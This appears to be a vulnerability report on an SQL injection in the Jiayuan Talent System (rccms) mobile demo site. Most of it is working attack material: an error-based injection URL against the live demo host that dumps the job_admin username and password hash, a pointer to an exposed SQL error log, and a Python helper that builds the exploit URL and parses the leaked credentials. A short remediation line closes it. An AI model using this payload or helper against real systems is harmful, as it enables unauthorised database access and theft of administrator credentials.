### Brief description:
Testing the vendor's official demo site
### Details:
Black-box discovery
Touch-screen (mobile) demo of the Jiayuan Talent System (嘉缘人才系统, rccms):
```
http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963
```
The `id` parameter is passed into the SQL query without any filtering or type casting.
[![4.png](https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png)](https://images.seebug.org/upload/201503/13174923ab5193122f31b4e654e5a279fb3b38c0.png)
MySQL throws an error on the injected value. Following the method in
[WooYun: 嘉缘人才系统最新版sql注入(直接出数据)](http://www.wooyun.org/bugs/wooyun-2015-0100830)
the path of the SQL error log file was obtained as
http://m.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt
Construct the following exploit (newlines `%0a` in place of spaces, a `@`'`` user-variable quote trick, then a `floor(rand(0)*2)` duplicate-key error-based extraction):
```
http://m.rccms.com/person/index.php?t=ajax&keyword=&search_type=&btnArea=&id=963 %0aand%0a@`'`%0aand%0a(SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(a_user,0x27,a_pass)) FROM job_admin limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)%23
```
The administrator username and password hash are dumped successfully via the MySQL "Duplicate entry" error:
[![8.png](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)
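The payload above works because `GROUP BY` on a key built from `floor(rand(0)*2)` recomputes the key while inserting into its temporary table, so by the third row of `information_schema.columns` MySQL tries to insert a key that already exists and reports it verbatim in a 1062 "Duplicate entry" error; whatever was concatenated in front of the random digit leaks with it. The following is an added helper, not code from the original report or from the vendor, that rebuilds the request URL from the report's parameters and parses the leaked `user'hash` pair out of the error text. The endpoint and parameter names are taken from the report; the table and column names (`job_admin`, `a_user`, `a_pass`) are passed in as arguments; the error line it parses is a constructed sample in the standard MySQL 1062 format, not a capture from the site.

```python
import re
import urllib.parse

# Added example. Assumptions: endpoint and parameter names as shown in the
# report; the MySQL error text below is a constructed sample, not a capture.
ENDPOINT = "http://m.rccms.com/person/index.php"


def build_payload(user_col: str, pass_col: str, table: str, row: int = 0) -> str:
    """Raw (not yet URL-encoded) value for the id parameter.

    Mirrors the shape of the report's payload: newlines instead of spaces,
    the @`'` user-variable quote trick, then the floor(rand(0)*2)
    duplicate-key error-based extraction. 0x27 (') separates user and hash.
    """
    leak = f"(SELECT concat({user_col},0x27,{pass_col}) FROM {table} limit {row},1)"
    return (
        "963\nand\n@`'`\nand\n"
        "(SELECT 1 FROM(SELECT count(*),concat(" + leak + ",floor(rand(0)*2))x "
        "FROM information_schema.columns group by x)a)#"
    )


def build_url(payload: str) -> str:
    """Full request URL; urlencode turns \\n into %0A and # into %23 as in the report."""
    params = {"t": "ajax", "keyword": "", "search_type": "", "btnArea": "", "id": payload}
    return ENDPOINT + "?" + urllib.parse.urlencode(params)


# MySQL reports the colliding group key as: Duplicate entry '<key>' for key 'group_key'
# (newer servers write '<group_key>'); the regex accepts both spellings.
_DUP = re.compile(r"Duplicate entry '(?P<key>.*)' for key '<?group_key>?'")


def extract_leak(response_text: str):
    """Return (user, password_hash) from a 1062 error, or None if absent.

    rand(0) yields 0,1,1,0,... so the first key inserted is '<leak>1' and the
    third row collides with it: the reported key always ends in the digit 1,
    which is stripped before splitting on the 0x27 separator from the payload.
    """
    m = _DUP.search(response_text)
    if not m:
        return None
    key = m.group("key")
    if key and key[-1] in "01":
        key = key[:-1]
    user, sep, pw_hash = key.partition("'")
    return (user, pw_hash) if sep else (key, "")


# Constructed sample of the error the server would log, not a real capture.
SAMPLE_ERROR = (
    "Warning: SQL error: Duplicate entry 'admin'e10adc3949ba59abbe56e057f20f883e1'"
    " for key 'group_key'"
)

if __name__ == "__main__":
    print(build_url(build_payload("a_user", "a_pass", "job_admin")))
    print(extract_leak(SAMPLE_ERROR))
```

Increment `row` to walk further `job_admin` rows. The root cause is the unfiltered `id`; the fix on the application side is to cast `id` to an integer (or bind it as a prepared-statement parameter) before it reaches the query, and to stop writing raw MySQL errors to a web-readable log file.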
### Proof of vulnerability:
[![8.png](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)](https://images.seebug.org/upload/201503/131751596c46235bc961999ed07689fbf27c99f8.png)